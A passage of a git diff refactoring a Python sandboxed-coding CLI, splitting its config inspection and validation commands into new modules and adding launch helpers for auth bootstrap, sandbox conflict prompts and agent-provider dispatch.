Additions[/bold yellow]") - for item in denied_additions: - console.print(f" [yellow]⚠[/yellow] {item['item']}: {item['reason']}") - console.print() - - if warnings: - console.print("[bold yellow]Warnings[/bold yellow]") - for warning in warnings: - console.print(f" [yellow]⚠[/yellow] {warning}") - console.print() - - raise typer.Exit(exit_code) - - def _render_config_decisions(effective: EffectiveConfig, field_filter: str | None) -> None: """Render config decisions grouped by field.""" - # Group decisions by field by_field: dict[str, list[ConfigDecision]] = {} for decision in effective.decisions: - field = decision.field.split(".")[0] # Get top-level field + field = decision.field.split(".")[0] if field_filter and field != field_filter: continue if field not in by_field: by_field[field] = [] by_field[field].append(decision) - # Also show effective values even if no explicit decisions if not field_filter or field_filter == "plugins": console.print("[bold cyan]Plugins[/bold cyan]") if effective.plugins: for plugin in sorted(effective.plugins): - # Find decision for this plugin plugin_decision = next( (d for d in effective.decisions if d.field == "plugins" and d.value == plugin), None, @@ -742,7 +532,6 @@ def _render_config_decisions(effective: EffectiveConfig, field_filter: str | Non ) else: console.print(f" [green]✓[/green] {plugin}") - # Plugin trust model note console.print() console.print( " [dim]Note: Plugins may bundle .mcp.json MCP servers. " @@ -756,7 +545,6 @@ def _render_config_decisions(effective: EffectiveConfig, field_filter: str | Non console.print("[bold cyan]Session Config[/bold cyan]") timeout = effective.session_config.timeout_hours or 8 auto_resume = effective.session_config.auto_resume - # Find decision for timeout timeout_decision = next( (d for d in effective.decisions if "timeout" in d.field.lower()), None, @@ -794,7 +582,6 @@ def _render_config_decisions(effective: EffectiveConfig, field_filter: str | Non console.print("[bold cyan]MCP Servers[/bold cyan]") if effective.mcp_servers: for server in effective.mcp_servers: - # Find decision for this server server_decision = next( ( d @@ -841,189 +628,3 @@ def _render_personal_profile(ws_path: Path, field_filter: str | None) -> None: console.print(" [dim]No personal MCP config saved[/dim]") console.print() - - -def _render_blocked_items(blocked_items: list[BlockedItem]) -> None: - """Render blocked items with patterns and fix-it commands.""" - from scc_cli.utils.fixit import generate_policy_exception_command - - console.print("[bold red]Blocked Items[/bold red]") - for item in blocked_items: - console.print( - f" [red]✗[/red] [bold]{item.item}[/bold] [dim](blocked by pattern '{item.blocked_by}' from {item.source})[/dim]" - ) - cmd = generate_policy_exception_command(item.item, item.target_type) - console.print(" [dim]To request exception (requires PR):[/dim]") - console.print(f" [cyan]{cmd}[/cyan]") - console.print() - - -def _render_denied_additions(denied_additions: list[DelegationDenied]) -> None: - """Render denied additions with reasons and fix-it commands.""" - from scc_cli.utils.fixit import generate_unblock_command - - console.print("[bold yellow]Denied Additions[/bold yellow]") - for denied in denied_additions: - console.print( - f" [yellow]⚠[/yellow] [bold]{denied.item}[/bold] [dim](requested by {denied.requested_by}: {denied.reason})[/dim]" - ) - cmd = generate_unblock_command(denied.item, denied.target_type) - console.print(" [dim]To unblock locally:[/dim]") - console.print(f" [cyan]{cmd}[/cyan]") - console.print() - - -def _render_active_exceptions() -> int: - """Render active exceptions from user and repo stores. - - Returns the count of expired exceptions found (for user notification). - """ - from datetime import datetime, timezone - - from ..models.exceptions import Exception as SccException - - # Load exceptions from both stores - user_store = UserStore() - repo_store = RepoStore(Path.cwd()) - - user_file = user_store.read() - repo_file = repo_store.read() - - # Filter active exceptions - now = datetime.now(timezone.utc) - active: list[tuple[str, SccException]] = [] # (source, exception) - expired_count = 0 - - for exc in user_file.exceptions: - try: - expires = datetime.fromisoformat(exc.expires_at.replace("Z", "+00:00")) - if expires > now: - active.append(("user", exc)) - else: - expired_count += 1 - except (ValueError, AttributeError): - expired_count += 1 - - for exc in repo_file.exceptions: - try: - expires = datetime.fromisoformat(exc.expires_at.replace("Z", "+00:00")) - if expires > now: - active.append(("repo", exc)) - else: - expired_count += 1 - except (ValueError, AttributeError): - expired_count += 1 - - if not active: - return expired_count - - console.print("[bold cyan]Active Exceptions[/bold cyan]") - - for source, exc in active: - # Format the exception target - targets: list[str] = [] - if exc.allow.plugins: - targets.extend(f"plugin:{p}" for p in exc.allow.plugins) - if exc.allow.mcp_servers: - targets.extend(f"mcp:{s}" for s in exc.allow.mcp_servers) - - target_str = ", ".join(targets) if targets else "none" - - # Calculate expires_in - try: - expires = datetime.fromisoformat(exc.expires_at.replace("Z", "+00:00")) - expires_in = format_relative(expires) - except (ValueError, AttributeError): - expires_in = "unknown" - - scope_badge = "[dim][local][/dim]" if exc.scope == "local" else "[cyan][policy][/cyan]" - console.print( - f" {scope_badge} {exc.id} {target_str} " - f"[dim]expires in {expires_in}[/dim] [dim](source: {source})[/dim]" - ) - - console.print() - return expired_count - - -# ───────────────────────────────────────────────────────────────────────────── -# Config Paths Command -# ───────────────────────────────────────────────────────────────────────────── - - -def _config_paths(json_output: bool = False, show_env: bool = False) -> None: - """Show SCC file locations with sizes and permissions. - - Uses the maintenance module's get_paths() to get XDG-aware paths. - """ - import os - - paths = get_paths() - total_size = get_total_size() - - if json_output: - output = { - "paths": [ - { - "name": p.name, - "path": str(p.path), - "exists": p.exists, - "size_bytes": p.size_bytes, - "permissions": p.permissions, - } - for p in paths - ], - "total_bytes": total_size, - } - if show_env: - output["environment"] = { - "XDG_CONFIG_HOME": os.environ.get("XDG_CONFIG_HOME", ""), - "XDG_CACHE_HOME": os.environ.get("XDG_CACHE_HOME", ""), - } - console.print(json.dumps(output, indent=2)) - return - - console.print("\n[bold cyan]SCC File Locations[/bold cyan]") - console.print("─" * 70) - - table = Table(box=box.SIMPLE, show_header=True, header_style="bold") - table.add_column("Name", style="cyan") - table.add_column("Path") - table.add_column("Size", justify="right") - table.add_column("Status") - table.add_column("Perm", justify="center") - - for path_info in paths: - exists_badge = "[green]✓ exists[/green]" if path_info.exists else "[dim]missing[/dim]" - perm_badge = path_info.permissions if path_info.permissions != "--" else "[dim]--[/dim]" - size_str = path_info.size_human if path_info.exists else "-" - - table.add_row( - path_info.name, - str(path_info.path), - size_str, - exists_badge, - perm_badge, - ) - - console.print(table) - console.print("─" * 70) - - # Show total - total_kb = total_size / 1024 - console.print(f"[bold]Total: {total_kb:.1f} KB[/bold]") - - # Show XDG environment variables if requested - if show_env: - console.print() - console.print("[bold]Environment Variables:[/bold]") - xdg_config = os.environ.get("XDG_CONFIG_HOME", "") - xdg_cache = os.environ.get("XDG_CACHE_HOME", "") - console.print( - f" XDG_CONFIG_HOME: {xdg_config if xdg_config else '[dim](not set, using ~/.config)[/dim]'}" - ) - console.print( - f" XDG_CACHE_HOME: {xdg_cache if xdg_cache else '[dim](not set, using ~/.cache)[/dim]'}" - ) - - console.print() diff --git a/src/scc_cli/commands/config_inspect.py b/src/scc_cli/commands/config_inspect.py new file mode 100644 index 0000000..6d3e726 --- /dev/null +++ b/src/scc_cli/commands/config_inspect.py @@ -0,0 +1,166 @@ +"""Config paths and exception inspection. + +Extracted from config.py to reduce module size. Contains: +- _config_paths: shows SCC file locations with sizes and permissions +- _render_active_exceptions: renders active exceptions from user/repo stores +""" + +from __future__ import annotations + +import json +from datetime import datetime, timezone +from pathlib import Path + +from rich import box +from rich.table import Table + +from ..cli_common import console +from ..maintenance import get_paths, get_total_size +from ..stores.exception_store import RepoStore, UserStore +from ..utils.ttl import format_relative + + +def _config_paths(json_output: bool = False, show_env: bool = False) -> None: + """Show SCC file locations with sizes and permissions.""" + import os + + paths = get_paths() + total_size = get_total_size() + + if json_output: + output: dict[str, object] = { + "paths": [ + { + "name": p.name, + "path": str(p.path), + "exists": p.exists, + "size_bytes": p.size_bytes, + "permissions": p.permissions, + } + for p in paths + ], + "total_bytes": total_size, + } + if show_env: + output["environment"] = { + "XDG_CONFIG_HOME": os.environ.get("XDG_CONFIG_HOME", ""), + "XDG_CACHE_HOME": os.environ.get("XDG_CACHE_HOME", ""), + } + console.print(json.dumps(output, indent=2)) + return + + console.print("\n[bold cyan]SCC File Locations[/bold cyan]") + console.print("─" * 70) + + table = Table(box=box.SIMPLE, show_header=True, header_style="bold") + table.add_column("Name", style="cyan") + table.add_column("Path") + table.add_column("Size", justify="right") + table.add_column("Status") + table.add_column("Perm", justify="center") + + for path_info in paths: + exists_badge = "[green]✓ exists[/green]" if path_info.exists else "[dim]missing[/dim]" + perm_badge = path_info.permissions if path_info.permissions != "--" else "[dim]--[/dim]" + size_str = path_info.size_human if path_info.exists else "-" + + table.add_row( + path_info.name, + str(path_info.path), + size_str, + exists_badge, + perm_badge, + ) + + console.print(table) + console.print("─" * 70) + + # Show total + total_kb = total_size / 1024 + console.print(f"[bold]Total: {total_kb:.1f} KB[/bold]") + + # Show XDG environment variables if requested + if show_env: + console.print() + console.print("[bold]Environment Variables:[/bold]") + xdg_config = os.environ.get("XDG_CONFIG_HOME", "") + xdg_cache = os.environ.get("XDG_CACHE_HOME", "") + console.print( + f" XDG_CONFIG_HOME: {xdg_config if xdg_config else '[dim](not set, using ~/.config)[/dim]'}" + ) + console.print( + f" XDG_CACHE_HOME: {xdg_cache if xdg_cache else '[dim](not set, using ~/.cache)[/dim]'}" + ) + + console.print() + + +def _render_active_exceptions() -> int: + """Render active exceptions from user and repo stores. + + Returns the count of expired exceptions found (for user notification). + """ + from ..models.exceptions import Exception as SccException + + # Load exceptions from both stores + user_store = UserStore() + repo_store = RepoStore(Path.cwd()) + + user_file = user_store.read() + repo_file = repo_store.read() + + # Filter active exceptions + now = datetime.now(timezone.utc) + active: list[tuple[str, SccException]] = [] # (source, exception) + expired_count = 0 + + for exc in user_file.exceptions: + try: + expires = datetime.fromisoformat(exc.expires_at.replace("Z", "+00:00")) + if expires > now: + active.append(("user", exc)) + else: + expired_count += 1 + except (ValueError, AttributeError): + expired_count += 1 + + for exc in repo_file.exceptions: + try: + expires = datetime.fromisoformat(exc.expires_at.replace("Z", "+00:00")) + if expires > now: + active.append(("repo", exc)) + else: + expired_count += 1 + except (ValueError, AttributeError): + expired_count += 1 + + if not active: + return expired_count + + console.print("[bold cyan]Active Exceptions[/bold cyan]") + + for source, exc in active: + # Format the exception target + targets: list[str] = [] + if exc.allow.plugins: + targets.extend(f"plugin:{p}" for p in exc.allow.plugins) + if exc.allow.mcp_servers: + targets.extend(f"mcp:{s}" for s in exc.allow.mcp_servers) + + target_str = ", ".join(targets) if targets else "none" + + # Calculate expires_in + try: + expires = datetime.fromisoformat(exc.expires_at.replace("Z", "+00:00")) + expires_in = format_relative(expires) + except (ValueError, AttributeError): + expires_in = "unknown" + + scope_badge = "[dim][local][/dim]" if exc.scope == "local" else "[cyan][policy][/cyan]" + console.print( + f" {scope_badge} {exc.id} {target_str} " + f"[dim]expires in {expires_in}[/dim] [dim](source: {source})[/dim]" + ) + + console.print() + return expired_count diff --git a/src/scc_cli/commands/config_validate.py b/src/scc_cli/commands/config_validate.py new file mode 100644 index 0000000..4243566 --- /dev/null +++ b/src/scc_cli/commands/config_validate.py @@ -0,0 +1,233 @@ +"""Config validation command. + +Extracted from config.py to reduce module size. Contains: +- _config_validate: validates .scc.yaml project configuration +- _render_blocked_items: renders blocked items with fix-it commands +- _render_denied_additions: renders denied additions with reasons +""" + +from __future__ import annotations + +from pathlib import Path +from typing import Any + +import typer + +from .. import config +from ..application.compute_effective_config import ( + BlockedItem, + DelegationDenied, + compute_effective_config, +) +from ..cli_common import console +from ..core.enums import RequestSource +from ..panels import create_error_panel, create_success_panel +from ..ports.config_models import NormalizedOrgConfig + + +def _config_validate( + *, + workspace_path: str | None, + team_override: str | None, + json_output: bool, +) -> None: + from ..core.exit_codes import EXIT_CONFIG, EXIT_GOVERNANCE, EXIT_SUCCESS + from ..json_output import build_envelope + from ..kinds import Kind + from ..output_mode import print_json + + errors: list[str] = [] + warnings: list[str] = [] + + org_config = config.load_cached_org_config() + if not org_config: + errors.append("No organization config found. Run 'scc setup' first.") + + team = team_override or config.get_selected_profile() + if not team: + errors.append("No team selected. Run 'scc team switch ' first.") + + ws_path = Path(workspace_path) if workspace_path else Path.cwd() + config_file = ws_path / config.PROJECT_CONFIG_FILE + + project_config: dict[str, Any] | None = None + if not errors and team and org_config: + profiles = org_config.get("profiles", {}) + if team not in profiles: + errors.append(f"Team '{team}' not found in org config.") + + if not errors: + try: + project_config = config.read_project_config(ws_path) + except ValueError as exc: + errors.append(str(exc)) + + if not errors and project_config is None: + if not config_file.exists(): + errors.append(f"No .scc.yaml found at {config_file}") + else: + errors.append(f"{config_file} is empty.") + + blocked_items: list[dict[str, Any]] = [] + denied_additions: list[dict[str, Any]] = [] + unknown_keys: list[str] = [] + + if not errors and project_config and org_config: + allowed_keys = {"additional_plugins", "additional_mcp_servers", "session"} + unknown_keys = sorted([key for key in project_config if key not in allowed_keys]) + if unknown_keys: + warnings.append("Unknown keys in .scc.yaml (ignored): " + ", ".join(unknown_keys)) + + project_session = project_config.get("session", {}) + if "auto_resume" in project_session: + warnings.append("session.auto_resume is advisory only and not enforced.") + + effective = compute_effective_config( + org_config=NormalizedOrgConfig.from_dict(org_config), + team_name=team, + project_config=project_config, + ) + + project_plugins = set(project_config.get("additional_plugins", [])) + project_mcp_tokens: set[str] = set() + for server in project_config.get("additional_mcp_servers", []): + name = server.get("name") + url = server.get("url") + if name: + project_mcp_tokens.add(name) + if url: + project_mcp_tokens.add(url) + + for blocked in effective.blocked_items: + if blocked.item not in project_plugins and blocked.item not in project_mcp_tokens: + continue + blocked_items.append( + { + "item": blocked.item, + "blocked_by": blocked.blocked_by, + "source": blocked.source, + "target_type": blocked.target_type, + } + ) + errors.append(f"{blocked.item} blocked by {blocked.blocked_by} ({blocked.source})") + + for denied in effective.denied_additions: + if denied.requested_by != RequestSource.PROJECT: + continue + denied_additions.append( + { + "item": denied.item, + "requested_by": denied.requested_by, + "reason": denied.reason, + "target_type": denied.target_type, + } + ) + errors.append(f"{denied.item} denied ({denied.reason})") + + ok = not errors + exit_code = EXIT_SUCCESS if ok else EXIT_CONFIG + if denied_additions or blocked_items: + exit_code = EXIT_GOVERNANCE + + if json_output: + data = { + "workspace_path": str(ws_path), + "team": team, + "project_config_path": str(config_file), + "project_config_found": project_config is not None, + "blocked_items": blocked_items, + "denied_additions": denied_additions, + "unknown_keys": unknown_keys, + } + envelope = build_envelope( + Kind.CONFIG_VALIDATE, + data=data, + ok=ok, + errors=errors, + warnings=warnings, + ) + print_json(envelope) + raise typer.Exit(exit_code) + + if ok: + team_label = team or "unknown" + console.print( + create_success_panel( + "Project Config Valid", + { + "Workspace": str(ws_path), + "Config": str(config_file), + "Team": team_label, + }, + ) + ) + else: + console.print( + create_error_panel( + "Project Config Invalid", + errors[0], + "Run 'scc config explain --field denied' for details.", + ) + ) + + if blocked_items: + _render_blocked_items_inline(blocked_items) + + if denied_additions: + _render_denied_additions_inline(denied_additions) + + if warnings: + console.print("[bold yellow]Warnings[/bold yellow]") + for warning in warnings: + console.print(f" [yellow]⚠[/yellow] {warning}") + console.print() + + raise typer.Exit(exit_code) + + +def _render_blocked_items_inline(blocked_items: list[dict[str, Any]]) -> None: + """Render blocked items from validation results (dict form).""" + console.print("[bold red]Blocked Items[/bold red]") + for item in blocked_items: + console.print(f" [red]✗[/red] {item['item']} [dim](blocked by {item['blocked_by']})[/dim]") + console.print() + + +def _render_denied_additions_inline(denied_additions: list[dict[str, Any]]) -> None: + """Render denied additions from validation results (dict form).""" + console.print("[bold yellow]Denied Additions[/bold yellow]") + for item in denied_additions: + console.print(f" [yellow]⚠[/yellow] {item['item']}: {item['reason']}") + console.print() + + +def _render_blocked_items(blocked_items: list[BlockedItem]) -> None: + """Render blocked items with patterns and fix-it commands.""" + from scc_cli.utils.fixit import generate_policy_exception_command + + console.print("[bold red]Blocked Items[/bold red]") + for item in blocked_items: + console.print( + f" [red]✗[/red] [bold]{item.item}[/bold] " + f"[dim](blocked by pattern '{item.blocked_by}' from {item.source})[/dim]" + ) + cmd = generate_policy_exception_command(item.item, item.target_type) + console.print(" [dim]To request exception (requires PR):[/dim]") + console.print(f" [cyan]{cmd}[/cyan]") + console.print() + + +def _render_denied_additions(denied_additions: list[DelegationDenied]) -> None: + """Render denied additions with reasons and fix-it commands.""" + from scc_cli.utils.fixit import generate_unblock_command + + console.print("[bold yellow]Denied Additions[/bold yellow]") + for denied in denied_additions: + console.print( + f" [yellow]⚠[/yellow] [bold]{denied.item}[/bold] " + f"[dim](requested by {denied.requested_by}: {denied.reason})[/dim]" + ) + cmd = generate_unblock_command(denied.item, denied.target_type) + console.print(" [dim]To unblock locally:[/dim]") + console.print(f" [cyan]{cmd}[/cyan]") + console.print() diff --git a/src/scc_cli/commands/exceptions.py b/src/scc_cli/commands/exceptions.py index 8bb4db8..b54d9c4 100644 --- a/src/scc_cli/commands/exceptions.py +++ b/src/scc_cli/commands/exceptions.py @@ -33,6 +33,7 @@ from ..evaluation import EvaluationResult, evaluate from ..models.exceptions import AllowTargets from ..models.exceptions import Exception as SccException +from ..ports.config_models import NormalizedOrgConfig from ..stores.exception_store import RepoStore, UserStore from ..utils.fuzzy import find_similar from ..utils.ttl import calculate_expiration, format_expiration, format_relative @@ -509,7 +510,7 @@ def get_current_denials() -> EvaluationResult: # Compute effective config for current workspace effective = compute_effective_config( - org_config=org_config, + org_config=NormalizedOrgConfig.from_dict(org_config), team_name=team, workspace_path=Path.cwd(), ) diff --git a/src/scc_cli/commands/init.py b/src/scc_cli/commands/init.py index f4e0e1f..71d3749 100644 --- a/src/scc_cli/commands/init.py +++ b/src/scc_cli/commands/init.py @@ -70,7 +70,7 @@ def generate_template_content() -> str: return """\ # SCC Project Configuration # ───────────────────────────────────────────────────────────────────────────── -# This file configures SCC (Sandboxed Claude CLI) for this project. +# This file configures SCC (Sandboxed Coding CLI) for this project. # Place this file in your repository root. # # For full documentation, see: https://scc-cli.dev/reference/configuration/project-schema/ diff --git a/src/scc_cli/commands/launch/__init__.py b/src/scc_cli/commands/launch/__init__.py index 4013ce9..eb4d627 100644 --- a/src/scc_cli/commands/launch/__init__.py +++ b/src/scc_cli/commands/launch/__init__.py @@ -1,5 +1,5 @@ """ -Launch package - commands for starting Claude Code in Docker sandboxes. +Launch package - commands for starting agents in Docker sandboxes. This package contains the decomposed launch functionality: - render.py: Pure output/display functions (no business logic) diff --git a/src/scc_cli/commands/launch/app.py b/src/scc_cli/commands/launch/app.py index e742225..2d08310 100644 --- a/src/scc_cli/commands/launch/app.py +++ b/src/scc_cli/commands/launch/app.py @@ -13,7 +13,7 @@ launch_app = typer.Typer( name="launch", - help="Start Claude Code in sandboxes.", + help="Start agent in sandboxes.", no_args_is_help=False, context_settings={"help_option_names": ["-h", "--help"]}, ) diff --git a/src/scc_cli/commands/launch/auth_bootstrap.py b/src/scc_cli/commands/launch/auth_bootstrap.py new file mode 100644 index 0000000..b54b2c2 --- /dev/null +++ b/src/scc_cli/commands/launch/auth_bootstrap.py @@ -0,0 +1,68 @@ +"""Auth bootstrap helpers for interactive launch flows. + +.. deprecated:: + All launch sites now use ``preflight.ensure_launch_ready``. + This module exists only as a backward-compatible redirect for tests + that exercise the old ``ensure_provider_auth`` signature. New code + should import from ``preflight`` directly. +""" + +from __future__ import annotations + +from collections.abc import Callable + +from scc_cli.application.start_session import StartSessionDependencies, StartSessionPlan +from scc_cli.commands.launch.preflight import ( + AuthStatus, + ImageStatus, + LaunchReadiness, + ProviderResolutionSource, + _ensure_auth, +) + + +def ensure_provider_auth( + plan: StartSessionPlan, + *, + dependencies: StartSessionDependencies, + non_interactive: bool, + show_notice: Callable[[str, str, str], None], +) -> None: + """Deprecated redirect — delegates to preflight._ensure_auth. + + Builds a minimal LaunchReadiness from the old plan+dependencies params + so existing tests keep working. Auth messaging is canonical in + ``preflight._ensure_auth``; this function adds no user-facing text. + """ + if plan.resume: + return + + provider = dependencies.agent_provider + if provider is None: + return + + readiness_obj = provider.auth_check() + if readiness_obj.status != "missing": + return + + profile = provider.capability_profile() + provider_id = profile.provider_id + + # Build the LaunchReadiness expected by _ensure_auth + lr = LaunchReadiness( + provider_id=provider_id, + resolution_source=ProviderResolutionSource.EXPLICIT, + image_status=ImageStatus.AVAILABLE, + auth_status=AuthStatus.MISSING, + requires_image_bootstrap=False, + requires_auth_bootstrap=True, + launch_ready=False, + ) + + _ensure_auth( + lr, + adapters=dependencies, + non_interactive=non_interactive, + show_notice=show_notice, + provider=provider, + ) diff --git a/src/scc_cli/commands/launch/conflict_resolution.py b/src/scc_cli/commands/launch/conflict_resolution.py new file mode 100644 index 0000000..c66e9a9 --- /dev/null +++ b/src/scc_cli/commands/launch/conflict_resolution.py @@ -0,0 +1,186 @@ +"""Interactive resolution for live sandbox launch conflicts.""" + +from __future__ import annotations + +from dataclasses import dataclass, replace +from enum import Enum, auto +from pathlib import Path + +from rich.console import Console + +from scc_cli.application.start_session import StartSessionDependencies, StartSessionPlan +from scc_cli.core.errors import ExistingSandboxConflictError +from scc_cli.panels import create_info_panel, create_warning_panel +from scc_cli.ports.models import SandboxConflict +from scc_cli.ui.chrome import print_with_layout +from scc_cli.ui.gate import is_interactive_allowed +from scc_cli.ui.list_screen import ListItem, ListScreen + + +class LaunchConflictDecision(Enum): + """User-facing resolution for an existing live sandbox.""" + + PROCEED = auto() + KEEP_EXISTING = auto() + CANCELLED = auto() + + +@dataclass(frozen=True) +class LaunchConflictResolution: + """Outcome from resolving a launch conflict.""" + + decision: LaunchConflictDecision + plan: StartSessionPlan + conflict: SandboxConflict | None = None + + +class _ConflictAction(Enum): + KEEP = auto() + REPLACE = auto() + CANCEL = auto() + + +def resolve_launch_conflict( + plan: StartSessionPlan, + *, + dependencies: StartSessionDependencies, + console: Console, + display_name: str, + json_mode: bool, + non_interactive: bool, +) -> LaunchConflictResolution: + """Resolve an already-running sandbox before launch-side effects begin.""" + sandbox_spec = plan.sandbox_spec + if sandbox_spec is None: + return LaunchConflictResolution(decision=LaunchConflictDecision.PROCEED, plan=plan) + + conflict = dependencies.sandbox_runtime.detect_launch_conflict(sandbox_spec) + if conflict is None: + return LaunchConflictResolution(decision=LaunchConflictDecision.PROCEED, plan=plan) + + container_name = conflict.handle.name or conflict.handle.sandbox_id + if not is_interactive_allowed( + json_mode=json_mode, + no_interactive_flag=non_interactive, + ): + raise ExistingSandboxConflictError( + container_name=container_name, + suggested_action=( + f"Use 'scc start --fresh' to replace it, 'scc stop {container_name}' " + "to stop it, or retry in an interactive terminal to choose." + ), + ) + + action = _prompt_for_conflict( + console=console, + conflict=conflict, + display_name=display_name, + workspace=plan.workspace_path, + ) + if action is _ConflictAction.REPLACE: + print_with_layout( + console, + "[dim]Replacing existing sandbox with a fresh launch...[/dim]", + ) + refreshed_spec = replace(sandbox_spec, force_new=True) + return LaunchConflictResolution( + decision=LaunchConflictDecision.PROCEED, + plan=replace(plan, sandbox_spec=refreshed_spec), + conflict=conflict, + ) + if action is _ConflictAction.KEEP: + _render_keep_existing_message( + console=console, + display_name=display_name, + container_name=container_name, + ) + return LaunchConflictResolution( + decision=LaunchConflictDecision.KEEP_EXISTING, + plan=plan, + conflict=conflict, + ) + return LaunchConflictResolution( + decision=LaunchConflictDecision.CANCELLED, + plan=plan, + conflict=conflict, + ) + + +def _prompt_for_conflict( + *, + console: Console, + conflict: SandboxConflict, + display_name: str, + workspace: Path, +) -> _ConflictAction: + """Prompt the user to resolve a live sandbox conflict.""" + container_name = conflict.handle.name or conflict.handle.sandbox_id + details = [ + f"A {display_name} sandbox is already active for this workspace.", + "", + f"Workspace: {workspace}", + f"Container: {container_name}", + ] + if conflict.process_summary: + details.append(f"Active process: {conflict.process_summary}") + details.append("") + details.append("Replacing it will stop the running sandbox.") + + console.print() + print_with_layout( + console, + create_warning_panel( + "Existing Sandbox Found", + "\n".join(details), + "Choose whether to keep it, replace it, or cancel this start request.", + ), + constrain=True, + ) + console.print() + + items = [ + ListItem( + value=_ConflictAction.KEEP, + label="Keep existing sandbox", + description="Leave the running sandbox untouched and return to the shell.", + ), + ListItem( + value=_ConflictAction.REPLACE, + label="Replace existing sandbox", + description="Stop the current sandbox and launch a fresh one here (--fresh).", + ), + ListItem( + value=_ConflictAction.CANCEL, + label="Cancel", + description="Do nothing and exit this start request.", + ), + ] + selection = ListScreen(items, title="Resolve Launch Conflict", viewport_height=6).run() + if selection is None: + return _ConflictAction.CANCEL + if isinstance(selection, list): # Defensive: SINGLE_SELECT should never return a list. + return _ConflictAction.CANCEL + return selection + + +def _render_keep_existing_message( + *, + console: Console, + display_name: str, + container_name: str, +) -> None: + """Explain what 'keep existing' means and what to do next.""" + console.print() + print_with_layout( + console, + create_info_panel( + "Kept Existing Sandbox", + f"Left the running {display_name} sandbox untouched:\n{container_name}", + ( + f"Use 'scc start --fresh' to replace it, 'scc stop {container_name}' " + "to stop it, or 'scc list -i' to inspect running sandboxes." + ), + ), + constrain=True, + ) + console.print() diff --git a/src/scc_cli/commands/launch/dependencies.py b/src/scc_cli/commands/launch/dependencies.py new file mode 100644 index 0000000..bc54129 --- /dev/null +++ b/src/scc_cli/commands/launch/dependencies.py @@ -0,0 +1,164 @@ +"""Shared builders for live launch-path dependencies and plans.""" + +from __future__ import annotations + +from rich.console import Console +from rich.status import Status + +from scc_cli.application.start_session import ( + StartSessionDependencies, + StartSessionPlan, + StartSessionRequest, + prepare_start_session, +) +from scc_cli.bootstrap import DefaultAdapters +from scc_cli.core.errors import InvalidLaunchPlanError, LaunchAuditUnavailableError +from scc_cli.marketplace.materialize import materialize_marketplace +from scc_cli.marketplace.resolve import resolve_effective_config +from scc_cli.ports.agent_provider import AgentProvider +from scc_cli.ports.agent_runner import AgentRunner +from scc_cli.ports.audit_event_sink import AuditEventSink +from scc_cli.theme import Spinners + +# Dict-based dispatch tables keyed by provider ID. +# Values are DefaultAdapters field names for each role. +_PROVIDER_DISPATCH: dict[str, dict[str, str]] = { + "claude": { + "agent_provider": "agent_provider", + "safety_adapter": "claude_safety_adapter", + "agent_runner": "agent_runner", + }, + "codex": { + "agent_provider": "codex_agent_provider", + "safety_adapter": "codex_safety_adapter", + "agent_runner": "codex_agent_runner", + }, +} + + +def get_agent_provider( + adapters: DefaultAdapters, + provider_id: str, +) -> AgentProvider | None: + """Look up the AgentProvider adapter for a given provider_id. + + Returns None if provider_id is unknown or the adapter field is not wired. + Single dispatch surface consumed by dependencies, provider_choice, and setup. + """ + dispatch = _PROVIDER_DISPATCH.get(provider_id) + if dispatch is None: + return None + return getattr(adapters, dispatch["agent_provider"], None) + + +def build_start_session_dependencies( + adapters: DefaultAdapters, + provider_id: str, +) -> StartSessionDependencies: + """Build the live start-session dependency bundle from wired adapters. + + Uses provider_id to dispatch the correct agent_provider and safety_adapter + from the available adapters. Raises InvalidProviderError if provider_id + is not in the dispatch table. + """ + if provider_id not in _PROVIDER_DISPATCH: + from scc_cli.core.errors import InvalidProviderError + from scc_cli.core.provider_registry import PROVIDER_REGISTRY + + raise InvalidProviderError( + provider_id=provider_id, + known_providers=tuple(PROVIDER_REGISTRY.keys()), + ) + dispatch = _PROVIDER_DISPATCH[provider_id] + + raw_provider = getattr(adapters, dispatch["agent_provider"], None) + provider = _require_agent_provider(raw_provider) + + raw_runner = getattr(adapters, dispatch["agent_runner"], None) + runner = _require_agent_runner(raw_runner) + + # Thread runtime_info from the probe if available. + runtime_info = None + if adapters.runtime_probe is not None: + runtime_info = adapters.runtime_probe.probe() + + sink = _require_audit_event_sink(adapters.audit_event_sink) + return StartSessionDependencies( + filesystem=adapters.filesystem, + remote_fetcher=adapters.remote_fetcher, + clock=adapters.clock, + git_client=adapters.git_client, + agent_runner=runner, + sandbox_runtime=adapters.sandbox_runtime, + resolve_effective_config=resolve_effective_config, + materialize_marketplace=materialize_marketplace, + agent_provider=provider, + audit_event_sink=sink, + runtime_info=runtime_info, + ) + + +def prepare_live_start_plan( + request: StartSessionRequest, + *, + adapters: DefaultAdapters, + console: Console, + provider_id: str | None = None, +) -> tuple[StartSessionDependencies, StartSessionPlan]: + """Build dependencies and prepare a live start plan with shared sync behavior. + + D032: provider_id must be explicitly supplied — either as a keyword argument + or on ``request.provider_id``. Raises InvalidProviderError when missing. + """ + resolved_pid = provider_id or request.provider_id + if not resolved_pid: + from scc_cli.core.errors import InvalidProviderError + from scc_cli.core.provider_registry import PROVIDER_REGISTRY + + raise InvalidProviderError( + provider_id="(none)", + known_providers=tuple(PROVIDER_REGISTRY.keys()), + ) + dependencies = build_start_session_dependencies(adapters, provider_id=resolved_pid) + if _should_sync_marketplace(request): + with Status( + "[cyan]Syncing marketplace settings...[/cyan]", + console=console, + spinner=Spinners.NETWORK, + ): + plan = prepare_start_session(request, dependencies=dependencies) + else: + plan = prepare_start_session(request, dependencies=dependencies) + return dependencies, plan + + +def _should_sync_marketplace(request: StartSessionRequest) -> bool: + return ( + not request.dry_run + and not request.offline + and not request.standalone + and request.team is not None + and request.org_config is not None + ) + + +def _require_agent_runner(runner: AgentRunner | None) -> AgentRunner: + if runner is None: + raise InvalidLaunchPlanError( + reason="Launch dependency builder is missing agent runner wiring.", + ) + return runner + + +def _require_agent_provider(provider: AgentProvider | None) -> AgentProvider: + if provider is None: + raise InvalidLaunchPlanError( + reason="Launch dependency builder is missing provider wiring.", + ) + return provider + + +def _require_audit_event_sink(sink: AuditEventSink | None) -> AuditEventSink: + if sink is None: + raise LaunchAuditUnavailableError() + return sink diff --git a/src/scc_cli/commands/launch/flow.py b/src/scc_cli/commands/launch/flow.py index e39adcd..7f49151 100644 --- a/src/scc_cli/commands/launch/flow.py +++ b/src/scc_cli/commands/launch/flow.py @@ -1,482 +1,145 @@ -""" -Launch flow helpers for the start command. +"""Launch flow helpers for the start command. + +This module contains the start() CLI entrypoint. Interactive wizard flows +live in flow_interactive.py; session resolution and personal profile helpers +live in flow_session.py. -This module contains the core logic for starting sessions, interactive -launch flows, and dashboard entrypoints. The CLI wrapper in app.py should -stay thin and delegate to these functions. +Re-exports public names for backward compatibility. """ from __future__ import annotations -import logging 